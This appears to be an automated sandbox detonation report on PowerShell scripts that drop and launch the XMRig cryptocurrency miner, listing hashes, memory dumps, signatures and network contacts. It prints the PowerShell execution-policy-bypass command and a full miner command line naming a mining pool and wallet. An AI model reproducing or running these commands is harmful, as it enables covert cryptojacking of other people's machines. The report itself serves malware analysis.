MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3292-50-0x000002CA9F850000-0x000002CA9F870000-memory.dmp

memory/3292-51-0x000002CA9F8A0000-0x000002CA9F8C0000-memory.dmp

memory/3292-52-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-55-0x000002CAA1090000-0x000002CAA10B0000-memory.dmp

memory/3292-54-0x000002CAA1070000-0x000002CAA1090000-memory.dmp

memory/3292-53-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-56-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3520-57-0x00007FFB57090000-0x00007FFB57B51000-memory.dmp

memory/3292-58-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-59-0x000002CAA1070000-0x000002CAA1090000-memory.dmp

memory/3292-60-0x000002CAA1090000-0x000002CAA10B0000-memory.dmp

memory/3292-61-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-62-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-63-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-64-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-65-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-66-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-67-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-68-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-69-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-70-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-71-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-72-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-73-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-74-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-75-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-76-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-77-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-78-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-79-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-80-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-81-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-82-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-83-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-84-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-85-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-86-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-87-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-88-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-89-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-90-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-91-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-92-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-93-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-94-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-95-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-96-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-97-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-98-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-99-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-100-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-101-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-102-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-103-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-104-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-105-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-106-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-107-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-108-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-109-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-110-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-111-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-112-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-113-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-114-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-115-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-116-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-117-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-118-0x00007FF616650000-0x00007FF617283000-memory.dmp

memory/3292-119-0x00007FF616650000-0x00007FF617283000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win11-20240426-en

Max time kernel

1791s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.48:443 tcp
US 8.8.8.8:53 77.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 155.83.221.88.in-addr.arpa udp

Files

memory/1068-0-0x00007FFE1E333000-0x00007FFE1E335000-memory.dmp

memory/1068-1-0x00000145F5F70000-0x00000145F5F92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyrcw1jt.njq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1068-10-0x00007FFE1E330000-0x00007FFE1EDF2000-memory.dmp

memory/1068-11-0x00007FFE1E330000-0x00007FFE1EDF2000-memory.dmp

memory/1068-12-0x00007FFE1E330000-0x00007FFE1EDF2000-memory.dmp

memory/1068-15-0x00000145F60E0000-0x00000145F60EA000-memory.dmp

memory/1068-14-0x00000145F6100000-0x00000145F6112000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2292-46-0x000001F9FA8D0000-0x000001F9FA8F0000-memory.dmp

memory/2292-47-0x000001F9FC2B0000-0x000001F9FC2D0000-memory.dmp

memory/1068-49-0x00007FFE1E330000-0x00007FFE1EDF2000-memory.dmp

memory/2292-48-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/1068-50-0x00007FFE1E333000-0x00007FFE1E335000-memory.dmp

memory/2292-53-0x000001F9FC2D0000-0x000001F9FC2F0000-memory.dmp

memory/2292-52-0x000001F9FC2F0000-0x000001F9FC310000-memory.dmp

memory/2292-51-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-54-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-55-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-57-0x000001F9FC2D0000-0x000001F9FC2F0000-memory.dmp

memory/2292-56-0x000001F9FC2F0000-0x000001F9FC310000-memory.dmp

memory/2292-58-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-59-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-60-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-61-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-62-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-63-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-64-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-65-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-66-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-67-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-68-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-69-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-70-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-71-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-72-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-73-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-74-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-75-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-76-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-77-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-78-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-79-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-80-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-81-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-82-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-83-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-84-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-85-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-86-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-87-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-88-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-89-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-90-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-91-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-92-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-93-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-94-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-95-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-96-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-97-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-98-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-99-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-100-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-101-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-102-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-103-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-104-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-105-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-106-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-107-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-108-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-109-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-110-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-111-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-112-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-113-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-114-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-115-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

memory/2292-116-0x00007FF654BC0000-0x00007FF6557F3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp

Files

memory/2348-0-0x00007FFC3E0D3000-0x00007FFC3E0D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwrta3b3.h4a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2348-9-0x00000267C4560000-0x00000267C4582000-memory.dmp

memory/2348-10-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp

memory/2348-11-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp

memory/2348-12-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp

memory/2348-14-0x00000267DCC80000-0x00000267DCC92000-memory.dmp

memory/2348-15-0x00000267C45F0000-0x00000267C45FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1112-46-0x000001D4E5830000-0x000001D4E5850000-memory.dmp

memory/1112-47-0x000001D4E7340000-0x000001D4E7360000-memory.dmp

memory/1112-48-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-50-0x000001D4E7360000-0x000001D4E7380000-memory.dmp

memory/1112-51-0x000001D4E7380000-0x000001D4E73A0000-memory.dmp

memory/2348-49-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp

memory/2348-53-0x00007FFC3E0D3000-0x00007FFC3E0D5000-memory.dmp

memory/1112-52-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/2348-54-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp

memory/1112-55-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-56-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-58-0x000001D4E7380000-0x000001D4E73A0000-memory.dmp

memory/1112-57-0x000001D4E7360000-0x000001D4E7380000-memory.dmp

memory/1112-59-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-60-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-61-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-62-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-63-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-64-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-65-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-66-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-67-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-68-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-69-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-70-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-71-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-72-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-73-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-74-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-75-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-76-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-77-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-78-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-79-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-80-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-81-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-82-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-83-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-84-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-85-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-86-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-87-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-88-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-89-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-90-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-91-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-92-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-93-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-94-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-95-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-96-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-97-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-98-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-99-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-100-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-101-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-102-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-103-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-104-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-105-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-106-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-107-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-108-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-109-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-110-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-111-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-112-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-113-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-114-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-115-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-116-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

memory/1112-117-0x00007FF74E110000-0x00007FF74ED43000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:35

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
